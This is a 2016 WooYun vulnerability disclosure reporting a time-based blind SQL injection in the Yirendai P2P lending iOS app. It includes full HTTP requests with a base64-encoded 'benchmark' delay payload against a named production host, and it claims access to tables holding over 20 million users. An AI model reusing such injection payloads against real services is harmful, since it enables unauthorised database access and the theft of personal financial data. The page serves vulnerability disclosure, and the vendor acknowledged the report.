当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0187007

漏洞标题:P2P安全之宜人贷官方APP存在SQL注入(含2000W+用户数据/40W+交易订单)

相关厂商:宜人贷

漏洞作者: 路人甲

提交时间:2016-03-20 16:31

修复时间:2016-05-04 16:41

公开时间:2016-05-04 16:41

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-20: 细节已通知厂商并且等待厂商处理中
2016-03-20: 厂商已经确认,细节仅向厂商公开
2016-03-30: 细节向核心白帽子及相关领域专家公开
2016-04-09: 细节向普通白帽子公开
2016-04-19: 细节向实习白帽子公开
2016-05-04: 细节向公众公开

简要描述:

APP安全之SQL注入

详细说明:

目标:宜人贷IOS APP
检测发现以下地方存在SQL注入:(POST中的singleCode,BASE64编码,时间盲注)

POST http://app.normal.yirendai.com/user/appUpdate HTTP/1.1
Host: app.normal.yirendai.com
Proxy-Connection: close
Content-Type: application/x-www-form-urlencoded; charset=utf-8
User-Agent: 宜人贷借款 3.4.0 rv:549 (iPhone; iPhone OS 9.2.1; zh_CN)
Content-Length: 315
Accept-Encoding: gzip
Connection: close
system=eyJhcHBWZXJzaW9uTmFtZSI6IjMuNC4wIiwic2luZ2xlQ29kZSI6IjU2NDQ0M0NDLTkxODktNDJDMS05Q0M5LTA5MjIxMTZBRDVDNCIsImxhdCI6IiIsImFwcFZlcnNpb25Db2RlIjoiNTQ5IiwiaXNFbXVsYXRvciI6IjAiLCJzeXN0ZW1QaG9uZSI6ImlvcyIsInN5c3RlbVZlcnNpb24iOiI5LjIwMDAwMCIsInRkQ2hhbm5lbElEIjoiYXBwU3RvcmUiLCJzeXN0ZW1Nb2RlbCI6ImlQaG9uZSIsImxuZyI6IiJ9


Payload:(延时)

POST http://app.normal.yirendai.com/user/appUpdate HTTP/1.1
Content-Length: 383
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip
Host: app.normal.yirendai.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ˴ 3.4.0 rv:549 (iPhone; iPhone OS 9.2.1; zh_CN)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Cookie: JSESSIONID=3C9A6D149C83DB1766AB156C0B0CC845.yrdasnew-01
Pragma: no-cache
Cache-Control: no-cache,no-store
Content-Type: application/x-www-form-urlencoded; charset=utf-8
system=eyJhcHBWZXJzaW9uTmFtZSI6IjMuNC4wIiwic2luZ2xlQ29kZSI6IjU2NDQ0M0NDLTkxODktNDJDMS05Q0M5LTA5MjIxMTZBRDVDNCcgWE9SKGlmKDE9MSxiZW5jaG1hcmsoMTAwMDAwMDAsbWQ1KDExMSkpLDApKWFuZCciLCJsYXQiOiIiLCJhcHBWZXJzaW9uQ29kZSI6IjU0OSIsImlzRW11bGF0b3IiOiIwIiwic3lzdGVtUGhvbmUiOiJpb3MiLCJzeXN0ZW1WZXJzaW9uIjoiOS4yMDAwMDAiLCJ0ZENoYW5uZWxJRCI6ImFwcFN0b3JlIiwic3lzdGVtTW9kZWwiOiJpUGhvbmUiLCJsbmciOiIifQ==

漏洞证明:

1、当前数据库用户

user.jpg


2、所有数据库

dbs.jpg


3、用户表,订单表,含2000W+用户数据/40W+交易订单,具体就不深入了

tb_user.jpg


tb_order.jpg

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-03-20 16:41

厂商回复:

感谢白帽子发现的问题,正在处理

最新状态:

暂无